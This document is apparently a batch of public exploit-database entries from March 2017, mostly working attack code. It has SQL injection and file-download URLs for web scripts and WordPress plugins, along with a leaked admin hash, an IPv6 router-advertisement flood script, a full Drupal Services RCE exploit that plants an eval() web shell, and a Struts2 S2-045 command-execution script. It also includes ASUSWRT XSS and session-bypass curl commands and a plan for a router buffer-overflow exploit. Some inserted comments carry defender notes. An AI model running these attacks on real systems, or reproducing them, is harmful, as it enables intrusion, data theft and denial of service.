
# # # # # 
# Exploit Title: Fashmark - eCommerce Script v1.2 - SQL Injection
# Google Dork: N/A
# Date: 09.03.2017
# Vendor Homepage: https://www.ncrypted.net/
# Software: https://www.ncrypted.net/fashmark
# Demo: http://demo.ncryptedprojects.com/fashmark-ent/
# Version: 1.2
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/search/?searchChar=Ihsan_Sencan&category=[SQL]
# Etc..
# # # # #
            
# # # # # 
# Exploit Title: TradeMart - B2B Trading Software v1.1 - SQL Injection
# Google Dork: N/A
# Date: 09.03.2017
# Vendor Homepage: https://www.ncrypted.net/
# Software: https://www.ncrypted.net/trademart
# Demo: http://demo.ncryptedprojects.com/trademart/
# Version: 1.1
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/Search?by=p&q=&user=[SQL]
# Etc..
# # # # #
            
#!/usr/bin/python

# Exploit Title: CVE-2017-6552 - Local DoS Buffer Overflow Livebox 3
# Date: 09/03/2017
# Exploit Author: Quentin Olagne
# Vendor Homepage: http://www.orange.fr/
# Version: SG30_sip-fr-5.15.8.1
# Tested on: Livebox 3 - Sagemcom
# CVE : CVE-2017-6552

'''
Livebox router has its default IPv6 routing table max. size too
small and therefore can be filled within minutes. 
An attacker can exploit this issue to render the affected system 
unresponsive, resulting in a denial-of-service condition for Phone, 
Internet and TV services.

Vulnerability has been discovered in April '16 and has been patched some time ago with the newest firmware. 
I have submitted the idea to have a button to enable/disable IPv6 stack on the local interface from the admin 
livebox web UI, don't know if it's been implemented. 

'''

from scapy.all import *
import time
import threading

start_time = time.time()

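def printit():
    """Print the elapsed wall-clock time every five seconds.

    Re-arms itself through threading.Timer, so a single call starts a periodic
    ticker for the life of the process. The timer thread is marked as a daemon
    so the interpreter can actually exit once the KeyboardInterrupt handler
    below has printed "Goodbye"; with a non-daemon timer the process would hang
    waiting on the next re-armed tick. Reads the module-level ``start_time``.
    """
    ticker = threading.Timer(5.0, printit)
    ticker.daemon = True  # do not keep the process alive after Ctrl-C
    ticker.start()
    elapsed = time.time() - start_time
    print 'Total time in seconds:', elapsed, '\n'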

printit()  # start the periodic elapsed-time ticker (re-arms itself every 5 s)

# One forged IPv6 Router Advertisement carrying a prefix-information option
# with a random /64 and a random source link-layer address. sendp(loop=1)
# below resends it without pause; RandIP6()/RandMAC() are scapy volatile
# fields, so each rebuilt copy presumably carries fresh values -- confirm
# against scapy's send loop. Defender note: the symptom is an RA flood from a
# single LAN port; RA Guard on access ports, or disabling IPv6 on the LAN
# interface as the author suggests above, stops the table from filling.
packet = Ether() \
    /IPv6() \
    /ICMPv6ND_RA() \
    /ICMPv6NDOptPrefixInfo(prefix=RandIP6(),prefixlen=64) \
    /ICMPv6NDOptSrcLLAddr(lladdr=RandMAC("00:01:42"))

try:
    sendp(packet,loop=1)
except KeyboardInterrupt:
        stored_exception=sys.exc_info()  # NOTE(review): never read afterwards; `sys` is not imported explicitly and only resolves if scapy's star-import re-exports it
except:
    pass  # NOTE(review): bare except hides every other failure (missing interface, no raw-socket privilege) and "Goodbye" is printed as if the run completed

print "Goodbye"
            
# Exploit Title: Drupal 7.x Services Module Remote Code Execution
# Vendor Homepage: https://www.drupal.org/project/services
# Exploit Author: Charles FOL
# Contact: https://twitter.com/ambionics 
# Website: https://www.ambionics.io/blog/drupal-services-module-rce


#!/usr/bin/php
<?php
# Drupal Services Module Remote Code Execution Exploit
# https://www.ambionics.io/blog/drupal-services-module-rce
# cf
#
# Three stages:
# 1. Use the SQL Injection to get the contents of the cache for current endpoint
#    along with admin credentials and hash
# 2. Alter the cache to allow us to write a file and do so
# 3. Restore the cache
# 

# Initialization

error_reporting(E_ALL);

# QID fills the uniqueIdentifier of the serialized SelectQueryExtender; the
# two TYPE_* constants are the request Content-Types used below; CONTROLLER
# and ACTION name the Services resource path every request is posted to.
define('QID', 'anything');
define('TYPE_PHP', 'application/vnd.php.serialized');
define('TYPE_JSON', 'application/json');
define('CONTROLLER', 'user');
define('ACTION', 'login');

# Lab target: site base URL and the Services REST endpoint beneath it.
$url = 'http://vmweb.lan/drupal-7.54';
$endpoint_path = '/rest_endpoint';
$endpoint = 'rest_endpoint';

# What stage 2 writes into the web root: a PHP stub that eval()s the raw POST
# body. Defender note: a new .php file under the web root that reads
# php://input, plus a PHP-serialized POST to <endpoint>/user/login in the
# access log, are the artefacts this run leaves behind.
$file = [
    'filename' => 'dixuSOspsOUU.php',
    'data' => '<?php eval(file_get_contents(\'php://input\')); ?>'
];

# Browser is declared at the bottom of the script; this works because PHP
# makes unconditional top-level class declarations available before the
# file's statements execute.
$browser = new Browser($url . $endpoint_path);


# Stage 1: SQL Injection

# Serialization gadget mirroring Drupal's DatabaseCondition. Only the property
# layout matters: it has to match the server-side class so unserialize()
# rebuilds it, and $stringVersion is the attacker-chosen text that -- per the
# SelectQueryExtender comment below -- ends up as the object's string form.
class DatabaseCondition
{
    protected $conditions = [
        "#conjunction" => "AND"
    ];
    protected $arguments = [];
    protected $changed = false;
    protected $queryPlaceholderIdentifier = null;
    public $stringVersion = null;

    # $stringVersion: SQL text to carry. When omitted, the object is flagged
    # changed (presumably so Drupal would recompile it instead of using the
    # stored string -- not exercised by this script).
    public function __construct($stringVersion=null)
    {
        $this->stringVersion = $stringVersion;

        if(!isset($stringVersion))
        {
            $this->changed = true;
            $this->stringVersion = null;
        }
    }
}

# Serialization gadget mirroring Drupal's SelectQueryExtender; the property
# set must match the server-side class for unserialize() to accept it.
class SelectQueryExtender {
    # Contains a DatabaseCondition object instead of a SelectQueryInterface
    # so that $query->compile() exists and (string) $query is controlled by us.
    protected $query = null;

    protected $uniqueIdentifier = QID;
    protected $connection;
    protected $placeholder = 0;

    # $sql: raw SQL fragment, wrapped so that casting this object to string
    # on the Drupal side yields it verbatim.
    public function __construct($sql)
    {
        $this->query = new DatabaseCondition($sql);
    }
}

# Cache row holding this endpoint's resource table; it is read back through
# the subselect embedded in the UNION below.
$cache_id = "services:$endpoint:resources";
$sql_cache = "SELECT data FROM {cache} WHERE cid='$cache_id'";
# Drupal 7 password hash, presumably of 'ouvreboite' (the password sent in
# $data below): the UNION row carries it in place of the real hash so the
# login succeeds with a known password. Confirm if the password is changed.
$password_hash = '$S$D2NH.6IZNb1vbZEV1F0S9fqIz3A0Y1xueKznB8vWrMsnV/nrTpnd';

# Take first user but with a custom password
# Store the original password hash in signature_format, and endpoint cache
# in signature
$query = 
    "0x3a) UNION SELECT ux.uid AS uid, " .
    "ux.name AS name, '$password_hash' AS pass, " .
    "ux.mail AS mail, ux.theme AS theme, ($sql_cache) AS signature, " .
    "ux.pass AS signature_format, ux.created AS created, " .
    "ux.access AS access, ux.login AS login, ux.status AS status, " .
    "ux.timezone AS timezone, ux.language AS language, ux.picture " .
    "AS picture, ux.init AS init, ux.data AS data FROM {users} ux " .
    "WHERE ux.uid<>(0"
;

# The username field is the gadget object, not a string; the whole body is
# PHP-serialized. Defender note: an endpoint accepting
# application/vnd.php.serialized is the precondition for every stage here --
# rejecting or alerting on that Content-Type at <endpoint>/user/login is the
# single choke point.
$query = new SelectQueryExtender($query);
$data = ['username' => $query, 'password' => 'ouvreboite'];
$data = serialize($data);

$json = $browser->post(TYPE_PHP, $data);

# If this worked, the rest will as well
if(!isset($json->user))
{
    print_r($json);
    e("Failed to login with fake password");
}

# Store session and user data
# Saved locally as session.json / user.json via store().

$session = [
    'session_name' => $json->session_name,
    'session_id' => $json->sessid,
    'token' => $json->token
];
store('session', $session);

$user = $json->user;

# Unserialize the cached value
# Note: Drupal websites admins, this is your opportunity to fight back :)
# (the response field is unserialized on the attacker's side here)
$cache = unserialize($user->signature);

# Reassign fields
# Put the real hash back under 'pass' and drop the two columns that were
# only used to smuggle data out.
$user->pass = $user->signature_format;
unset($user->signature);
unset($user->signature_format);

store('user', $user);

if($cache === false)
{
    e("Unable to obtains endpoint's cache value");
}

x("Cache contains " . sizeof($cache) . " entries");

# Stage 2: Change endpoint's behaviour to write a shell

# Mirrors Drupal's DrupalCacheArray property layout so the server accepts it
# on unserialize(). $storage is the endpoint's resource table fetched in
# stage 1; when a controller/action pair is given, that action's definition
# is replaced by one whose callback is file_put_contents, with both
# arguments taken from the POST body. With nulls, $storage is stored as is.
class DrupalCacheArray
{
    # Cache ID
    protected $cid = "services:endpoint_name:resources";
    # Name of the table to fetch data from.
    # Can also be used to SQL inject in DrupalDatabaseCache::getMultiple()
    protected $bin = 'cache';
    protected $keysToPersist = [];
    protected $storage = [];

    # $storage: resource table to carry; $endpoint: name used in the cache id;
    # $controller/$action: resource to rewire, or null/null to restore.
    function __construct($storage, $endpoint, $controller, $action) {
        $settings = [
            'services' => ['resource_api_version' => '1.0']
        ];
        $this->cid = "services:$endpoint:resources";

        # If no endpoint is given, just reset the original values
        if(isset($controller))
        {
            $storage[$controller]['actions'][$action] = [
                'help' => 'Writes data to a file',
                # Callback function
                'callback' => 'file_put_contents',
                # This one does not accept "true" as Drupal does,
                # so we just go for a tautology
                'access callback' => 'is_string',
                'access arguments' => ['a string'],
                # Arguments given through POST
                'args' => [
                    0 => [
                        'name' => 'filename',
                        'type' => 'string',
                        'description' => 'Path to the file',
                        'source' => ['data' => 'filename'],
                        'optional' => false,
                    ],
                    1 => [
                        'name' => 'data',
                        'type' => 'string',
                        'description' => 'The data to write',
                        'source' => ['data' => 'data'],
                        'optional' => false,
                    ],
                ],
                'file' => [
                    'type' => 'inc',
                    'module' => 'services',
                    'name' => 'resources/user_resource',
                ],
                'endpoint' => $settings
            ];
            # Mark the action enabled in the endpoint's own settings too.
            $storage[$controller]['endpoint']['actions'] += [
                $action => [
                    'enabled' => 1,
                    'settings' => $settings
                ]
            ];
        }

        $this->storage = $storage;
        # Flag every top-level key, presumably so the whole table is written
        # back to the cache bin rather than a partial update -- the persisting
        # code itself lives in Drupal and is not visible here.
        $this->keysToPersist = array_fill_keys(array_keys($storage), true);
    }
}

# The concrete class name the server instantiates; Drupal's ThemeRegistry
# extends DrupalCacheArray, and these two extra properties match its
# declaration so unserialize() on the server side accepts the object.
class ThemeRegistry Extends DrupalCacheArray {
    protected $persistable;
    protected $completeRegistry;
}

# Replace the login action's definition in the endpoint cache (see
# DrupalCacheArray), then post $file as JSON so the rewired action writes it.
cache_poison($endpoint, $cache);

# Write the file
$json = (array) $browser->post(TYPE_JSON, json_encode($file));


# Stage 3: Restore endpoint's behaviour
# Done before the result check so the endpoint is put back even on failure.

cache_reset($endpoint, $cache);

# file_put_contents returns the byte count; presumably the endpoint echoes it
# back as the first JSON element, hence the strict comparison with strlen().
if(!(isset($json[0]) && $json[0] === strlen($file['data'])))
{
    e("Failed to write file.");
}

$file_url = $url . '/' . $file['filename'];
x("File written: $file_url");


# HTTP Browser

class Browser
{
    private $url;
    private $controller = CONTROLLER;
    private $action = ACTION;

    # $url: base URL of the Services endpoint. Every request goes to
    # <url>/<controller>/<action>, with the constants fixed at declaration.
    function __construct($url)
    {
        $this->url = $url;
    }

    # POST $data with Content-Type $type and return the JSON-decoded body
    # (null when the body is not valid JSON). A transport-level cURL error
    # aborts the script through e().
    # NOTE(review): certificate verification is disabled for both host and
    # peer, so an https target is reached without any TLS authentication.
    function post($type, $data)
    {
        $target = implode('/', [$this->url, $this->controller, $this->action]);
        $headers = [
            "Accept: " . TYPE_JSON,
            "Content-Type: $type",
            "Content-Length: " . strlen($data)
        ];

        $ch = curl_init();
        curl_setopt_array($ch, [
            CURLOPT_URL => $target,
            CURLOPT_HTTPHEADER => $headers,
            CURLOPT_POST => 1,
            CURLOPT_POSTFIELDS => $data,
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_SSL_VERIFYHOST => 0,
            CURLOPT_SSL_VERIFYPEER => 0,
        ]);
        $body = curl_exec($ch);
        $failure = curl_error($ch);
        curl_close($ch);

        if($failure)
        {
            e("cURL: $failure");
        }

        return json_decode($body);
    }
}

# Cache

# Stage 2 helper: build a ThemeRegistry whose storage has the login action
# rewired (see DrupalCacheArray) and send it to the server.
function cache_poison($endpoint, $cache)
{
    $tr = new ThemeRegistry($cache, $endpoint, CONTROLLER, ACTION);
    cache_edit($tr);
}

# Stage 3 helper: the same object with no controller/action, so the
# constructor leaves $cache untouched and the original table is sent back.
function cache_reset($endpoint, $cache)
{
    $tr = new ThemeRegistry($cache, $endpoint, null, null);
    cache_edit($tr);
}

# POST a PHP-serialized array holding $tr as the login body. Presumably the
# server-side unserialize()/teardown of the ThemeRegistry is what writes its
# storage into the cache table; that Drupal code is not visible here.
# NOTE(review): the response in $json is never inspected, so a failed cache
# write is only noticed when the later file write does not match.
function cache_edit($tr)
{
    global $browser;
    $data = serialize([$tr]);
    $json = $browser->post(TYPE_PHP, $data);
}

# Utils

# Print $message followed by a newline.
function x($message)
{
    echo $message . "\n";
}

# Print $message and stop the script with a non-zero exit status.
function e($message)
{
    x($message);
    die(1);
}

# Dump $data as pretty-printed JSON into "<name>.json" in the working
# directory and report the path.
function store($name, $data)
{
    $filename = sprintf('%s.json', $name);
    $encoded = json_encode($data, JSON_PRETTY_PRINT);
    file_put_contents($filename, $encoded);
    x(sprintf('Stored %s information in %s', $name, $filename));
}
            
# # # # # 
# Exploit Title: WordPress Plugin Mac Photo Gallery v3.0 - Arbitrary File Download
# Google Dork: N/A
# Date: 09.03.2017
# Vendor Homepage: https://www.apptha.com/
# Software: https://www.apptha.com/category/extension/Wordpress/Mac-Photo-Gallery
# Demo: http://www.apptha.com/demo/mac-photo-gallery
# Version: 3.0
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# Exploit :
# http://localhost/[PLUGIN_PATH]/macdownload.php?albid=../../../wp-load.php
# Etc..
# # # # #
            
# # # # # 
# Exploit Title: WordPress Plugin Apptha Slider Gallery v1.0 - SQL Injection
# Google Dork: N/A
# Date: 09.03.2017
# Vendor Homepage: https://www.apptha.com/
# Software: https://www.apptha.com/category/extension/Wordpress/apptha-slider-gallery
# Demo: http://www.apptha.com/demo/apptha-slider-gallery
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/?albid=[SQL]
# For example;
# -3+/*!50000union*/+select+1,2,3,4,5,0x496873616e2053656e63616e20207777772e696873616e2e6e6574,concat(user_login,0x3a,user_pass),8,9,10,11,12,13,14+from+pleasant_users--+-&pid=6
# admin:$P$BKL0XND.tfopqZH6S.QU.vhgjuVchx1
# Etc..
# # # # #
            
# # # # # 
# Exploit Title: WordPress Plugin Apptha Slider Gallery v1.0 - Arbitrary File Download
# Google Dork: N/A
# Date: 09.03.2017
# Vendor Homepage: https://www.apptha.com/
# Software: https://www.apptha.com/category/extension/Wordpress/apptha-slider-gallery
# Demo: http://www.apptha.com/demo/apptha-slider-gallery
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PLUGIN_PATH]/asgallDownload.php?imgname=../../../wp-load.php
# Etc..
# # # # #
            
# # # # # 
# Exploit Title: WordPress Plugin PICA Photo Gallery v1.0 - SQL Injection
# Google Dork: N/A
# Date: 09.03.2017
# Vendor Homepage: https://www.apptha.com/
# Software: https://www.apptha.com/category/extension/Wordpress/PICA-Photo-Gallery
# Demo: http://www.apptha.com/demo/pica-photo-gallery
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/?aid=[SQL]
# For example;
# -3+/*!50000union*/+select+0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,2,3,@@version--+-
# wpapptha_term_relationships,wpapptha_term_taxonomy,wpapptha_terms,wpapptha_usermeta,wpapptha_users
# Etc..
# # # # #
            
#!/usr/bin/python
# -*- coding: utf-8 -*-

import urllib2
import httplib


def exploit(url, cmd):
    """Send one request to *url* whose Content-Type header is an OGNL
    expression that runs *cmd* on the Struts2 host (S2-045, CVE-2017-5638),
    print the response body and return it.

    The payload string is kept exactly as written; its form is what the
    server-side parser reacts to. ``cmd`` is substituted inside single quotes
    without escaping, so a command containing ``'`` breaks the expression.

    Defender note: the distinguishing artefact is a Content-Type header whose
    value starts with ``%{`` and names ``OgnlContext`` / ``ProcessBuilder`` --
    a header match that a WAF rule or access-log review can key on. A Struts
    release that fixes S2-045 no longer evaluates this header.
    """
    payload = "%{(#_='multipart/form-data')."
    payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
    payload += "(#_memberAccess?"
    payload += "(#_memberAccess=#dm):"
    payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
    payload += "(#ognlUtil.getExcludedPackageNames().clear())."
    payload += "(#ognlUtil.getExcludedClasses().clear())."
    payload += "(#context.setMemberAccess(#dm))))."
    payload += "(#cmd='%s')." % cmd
    payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
    payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
    payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
    payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
    payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
    payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
    payload += "(#ros.flush())}"

    # Only a truncated response is handled (its partial body is kept); any
    # other urllib2/httplib error propagates to the caller. Python 2 syntax.
    try:
        headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
        request = urllib2.Request(url, headers=headers)
        page = urllib2.urlopen(request).read()
    except httplib.IncompleteRead, e:
        page = e.partial

    print(page)
    return page


if __name__ == '__main__':
    import sys
    # Exactly two positional arguments: the target URL and the command.
    args = sys.argv[1:]
    if len(args) == 2:
        print('[*] CVE: 2017-5638 - Apache Struts2 S2-045')
        url, cmd = args
        print("[*] cmd: %s\n" % cmd)
        exploit(url, cmd)
    else:
        print("[*] struts2_S2-045.py <url> <cmd>")
            
Cross-Site Scripting (XSS)

Component: httpd

CVE: CVE-2017-6547

Vulnerability:

httpd checks in the function handle_request if the requested file name is longer than 50 chars. It then responds with a redirection which allows an attacker to inject arbitrary JavaScript code into the router’s web interface context.

...

if(strlen(file) > 50 &&!(strstr(file, "findasus")) && !(strstr(file, "acme-challenge")))
{
    char inviteCode[256];
    snprintf(inviteCode, sizeof(inviteCode), "<script>location.href='/cloud_sync.asp?flag=%s';</script>", file);
    send_page( 200, "OK", (char*) 0, inviteCode, 0);

...
PoC:

http://192.168.1.1/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';alert('XSS');'A
            
Session Stealing

Component: httpd

CVE: CVE-2017-6549

Vulnerability:

httpd uses the function search_token_in_list to validate if a user is logged into the admin interface by checking his asus_token value. There seems to be a branch which could be a failed attempt to build in a logout functionality.

/*
 * Look up a session token in the global list of active admin sessions.
 *
 * token: the asus_token cookie value taken from the request
 * prev:  when non-NULL, receives the node preceding the match (NULL when the
 *        match is the head or was reached without advancing)
 * Returns the matching node, or NULL when nothing matched.
 *
 * CVE-2017-6549: the middle branch lets the literal token "cgi_logout" match
 * the first stored session whose User-Agent does not begin with "asusrouter"
 * (strtok splits it on '-'); ptr->token is never compared on that path, so
 * any active admin session authenticates such a request. The fix is to let
 * only the exact-token branch set found and to handle logout elsewhere.
 */
asus_token_t* search_token_in_list(char* token, asus_token_t **prev)
{
    asus_token_t *ptr = head;       /* global list head, declared elsewhere */
    asus_token_t *tmp = NULL;
    int found = 0;
    char *cp = NULL;

    while(ptr != NULL)
    {
        if(!strncmp(token, ptr->token, 32)) {
            found = 1;
            break;
        }
        else if(strncmp(token, "cgi_logout", 10) == 0) {
            /* strtok writes a NUL into the stored useragent, mutating the
             * session record; it returns NULL for an empty string, which the
             * strcmp below would then dereference. */
            cp = strtok(ptr->useragent, "-");

            if(strcmp(cp, "asusrouter") != 0) {
                found = 1;
                break;
            }
            /* ptr is not advanced here: a "cgi_logout" token against a
             * session whose useragent does start with "asusrouter" never
             * leaves this loop. */
        }
        else {
            tmp = ptr;
            ptr = ptr->next;
        }
    }
    
    if(found == 1) {
        if(prev)
            *prev = tmp;
        return ptr;
    }   
    else {
        return NULL;
    }
}
If an attacker sets his cookie value to cgi_logout and puts asusrouter-Windows-IFTTT-1.0 into his User-Agent header he will be treated as signed-in if any other administrator session is active.

PoC:

# read syslog
curl -H 'User-Agent: asusrouter-Windows-IFTTT-1.0' -H 'Cookie: asus_token=cgi_logout' http://192.168.1.1/syslog.txt

#reboot router
curl -H 'User-Agent: asusrouter-Windows-IFTTT-1.0' -H 'Cookie: asus_token=cgi_logout' http://192.168.1.1/apply.cgi1 -d 'action_mode=reboot&action_script=&action_wait=70'
It’s possible to execute arbitrary commands on the router if any admin session is currently active.
            
Remote Code Execution

Component: networkmap

CVE: CVE-2017-6548

networkmap is responsible for generating a map of computers connected to the router. It continuously monitors the LAN to detect ARP requests submitted by unknown computers. When a new MAC address appears it will probe the related IP address for running services like printer sharing, http server and also iTunes servers.

This is implemented by sending out multicast SSDP discoveries:

M-SEARCH * HTTP/1.1
HOST: 239.255.255.250:1900
ST:upnp:rootdevice
MAN:"ssdp:discover"
MX:3
A device can then respond with messages which indicate the location of the iTunes service.

HTTP/1.1 200 OK
Location:HTTP://host:port/path
Vulnerability:

The function process_device_response is responsible for parsing the SSDP answer:

                                                                                                                                             
/************************************************************************************************/
// process the device response "HTTP/1.1 200 OK"
int process_device_response(char *msg)
{
        char *line, *body, *p;                  // temporary variables
        char *location = NULL;                  // the LOCATION: header
        char host[16], port[6];                 // the ip and port of the device
        ushort destport;                        // the integer type of device port
        char *data = NULL;                      // the data in packet
        int http_fd;                            // the http socket fd
        int nbytes;                             // recv number
        int i;
        char *descri = NULL;
        int len;
	struct timeval timeout={10, 0};

        //search "\r\n\r\n" or "\r\n" first appear place and judge whether msg have blank.
        if( (body = strstr(msg, "\r\n\r\n")) != NULL)
                body +=4;
        else if ( (body = strstr(msg, "\r\n")) != NULL)
                body +=2;
        else
                return 0;
                                                                                                                                             
        p = msg;
        // find the LOCATION information.
        while( p!= NULL && p < body)
        {
                line = strsep(&p, "\r\n");      //divide up string
                if((strncmp(line, "LOCATION:", 9) == 0) || (strncmp(line, "Location:", 9) == 0))
                {
                        location = strip_chars(&line[9], "\t");
                        location = strip_chars(&line[9], " ");
                        break;
                }
        }
        NMP_DEBUG_F("UPnP location=%s\n", location);
        //fprintf(fp_upnp, "UPnP location=%s\n", location);//Yau                                                                                                                                     
        // get the destination ip
        location += 7;
	i = 0;
	while( (*location != ':') && (*location != '/')) {
                host[i] = *location++;
		i++;
	}
        host[i] = '\0';
        //get the destination port
        if(*location == ':') {
            	for(location++, i =0; *location != '/'; i++)
                	port[i] = *location++;
            	port[i] = '\0';
            	destport = (ushort)atoi(port);
	}
	else
		destport = 80;
It contains multiple buffer overflows in the parsing code for host and port. This stack-based overflow can be used to gain control over networkmap’s control flow by overwriting the saved $pc stored on the stack.

Parsing this message:

HTTP/1.1 200 OK
Location:HTTP://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/
will overflow host[16] and lead to $pc being set to 0x41414141 which is a starting point for further exploitation.

Exploitation:

In order to develop a working exploit we gather further information of the system.

General Information:

ASUSWRT is based on Linux which is running on a little endian MIPS CPU. The vulnerable program networkmap gets automatically started when the device boots and additionally gets restarted by the watchdog process if it crashes.

# cat /proc/cpuinfo 
system type     : MT7620
processor       : 0
cpu model       : MIPS 24Kc V5.0
BogoMIPS        : 386.04
wait instruction    : yes
microsecond timers  : yes
tlb_entries     : 32
extra interrupt vector  : yes
hardware watchpoint : yes, count: 4, address/irw mask: [0x0000, 0x0ff8, 0x0ff8, 0x0ff8]
ASEs implemented    : mips16 dsp
shadow register sets    : 1
core            : 0
VCED exceptions     : not available
VCEI exceptions     : not available

# ps
  PID USER       VSZ STAT COMMAND
    1 admin     3940 S    /sbin/init
    2 admin        0 SW   [kthreadd]
    3 admin        0 SW   [ksoftirqd/0]
    4 admin        0 SW   [kworker/0:0]
    5 admin        0 SW   [kworker/u:0]
    6 admin        0 SW<  [khelper]
    7 admin        0 SW   [sync_supers]
    8 admin        0 SW   [bdi-default]
    9 admin        0 SW<  [kintegrityd]
   10 admin        0 SW<  [kblockd]
   11 admin        0 SW   [kswapd0]
   12 admin        0 SW   [fsnotify_mark]
   13 admin        0 SW<  [crypto]
   17 admin        0 SW   [mtdblock0]
   18 admin        0 SW   [mtdblock1]
   19 admin        0 SW   [mtdblock2]
   20 admin        0 SW   [mtdblock3]
   21 admin        0 SW   [mtdblock4]
   22 admin        0 SW   [mtdblock5]
   23 admin        0 SW   [kworker/u:1]
   30 admin        0 SW   [kworker/0:1]
   41 admin      660 S    hotplug2 --persistent --no-coldplug
   76 admin     3924 S    console
   78 admin     1276 S    /sbin/syslogd -m 0 -S -O /tmp/syslog.log -s 256 -l 6
   80 admin     1276 S    /sbin/klogd -c 5
   82 admin     1292 S    /bin/sh
  115 admin        0 SW   [RtmpCmdQTask]
  116 admin        0 SW   [RtmpWscTask]
  135 admin        0 SW   [RtmpCmdQTask]
  136 admin        0 SW   [RtmpWscTask]
  164 admin     3932 S    /sbin/wanduck
  168 admin     1128 S    dropbear -p 192.168.1.1:22 -a
  175 admin     3932 S    wpsaide
  189 nobody    1056 S    dnsmasq --log-async
  194 admin     2588 S    avahi-daemon: running [RT-AC53-B8F4.local]
  196 admin     4112 S    httpd -i br0
  197 admin     1068 S    /usr/sbin/infosvr br0
  199 admin     3932 S    watchdog
  201 admin     2180 S    rstats
  210 admin     1160 S    lld2d br0
  211 admin     3932 S    ots
  224 admin      800 S    miniupnpd -f /etc/upnp/config
  229 admin     1284 S    /sbin/udhcpc -i vlan2 -p /var/run/udhcpc0.pid -s /tmp/udhcpc -O33 -O249
  302 admin     1152 S    dropbear -p 192.168.1.1:22 -a
  303 admin     1300 S    -sh
  344 admin     1128 S    networkmap
  359 admin     1280 R    ps

# uname -a
Linux (none) 2.6.36 #1 Fri Sep 23 12:05:55 CST 2016 mips GNU/Linux
Memory Map:

networkmap’s memory map is analyzed to continue exploiting the device.

# cat /proc/$(pidof networkmap)/maps
00400000-0040b000 r-xp 00000000 1f:04 270        /usr/sbin/networkmap
0041a000-0041b000 rw-p 0000a000 1f:04 270        /usr/sbin/networkmap
0041b000-0041f000 rwxp 00000000 00:00 0          [heap]
2b893000-2b894000 rw-p 00000000 00:00 0 
2b894000-2b89a000 r-xp 00000000 1f:04 828        /lib/ld-uClibc.so.0
2b89a000-2b8a0000 rw-s 00000000 00:04 0          /SYSV000003e9 (deleted)
2b8a0000-2b8a4000 rw-s 00000000 00:04 32769      /SYSV000003ea (deleted)
2b8a9000-2b8aa000 r--p 00005000 1f:04 828        /lib/ld-uClibc.so.0
2b8aa000-2b8ab000 rw-p 00006000 1f:04 828        /lib/ld-uClibc.so.0
2b8ab000-2b8d9000 r-xp 00000000 1f:04 258        /usr/lib/libshared.so
2b8d9000-2b8e8000 ---p 00000000 00:00 0 
2b8e8000-2b8eb000 rw-p 0002d000 1f:04 258        /usr/lib/libshared.so
2b8eb000-2b8ed000 rw-p 00000000 00:00 0 
2b8ed000-2b8ef000 r-xp 00000000 1f:04 235        /usr/lib/libnvram.so
2b8ef000-2b8ff000 ---p 00000000 00:00 0 
2b8ff000-2b900000 rw-p 00002000 1f:04 235        /usr/lib/libnvram.so
2b900000-2b90e000 r-xp 00000000 1f:04 760        /lib/libgcc_s.so.1
2b90e000-2b91e000 ---p 00000000 00:00 0 
2b91e000-2b91f000 rw-p 0000e000 1f:04 760        /lib/libgcc_s.so.1
2b91f000-2b95a000 r-xp 00000000 1f:04 827        /lib/libc.so.0
2b95a000-2b96a000 ---p 00000000 00:00 0 
2b96a000-2b96b000 rw-p 0003b000 1f:04 827        /lib/libc.so.0
2b96b000-2b96f000 rw-p 00000000 00:00 0 
2b970000-2b97f000 r--s 03eb0000 00:0c 78         /dev/nvram
7f8a7000-7f8c8000 rwxp 00000000 00:00 0          [stack]
7fff7000-7fff8000 r-xp 00000000 00:00 0          [vdso]
Observations:

Partial ASLR is activated:

Stack address is randomized
Library addresses are randomized
Program address is not randomized
Heap address is not randomized
There is no Stack-Protector

Both heap and stack are mapped executable

The binary contains almost no gadgets suitable for building a ROP chain

Exploit:

The final exploit consists of the following steps:

Starting a webserver serving shellcode
Listening for multicast UDP messages sent by the router
Database clearing / crashing: to make the heap layout predictable
Randomizing MAC address
Send message: jump to gadget that deletes networkmap’s database and crashes
networkmap will be restarted
Spraying heap 1, 2:
Randomizing MAC address
Send message: containing the webserver’s IP+port
networkmap will receive shellcode and store it on the heap
Starting payload
Randomize MAC address
Send message: jump to heap address containing the shellcode
Connect to opened shell
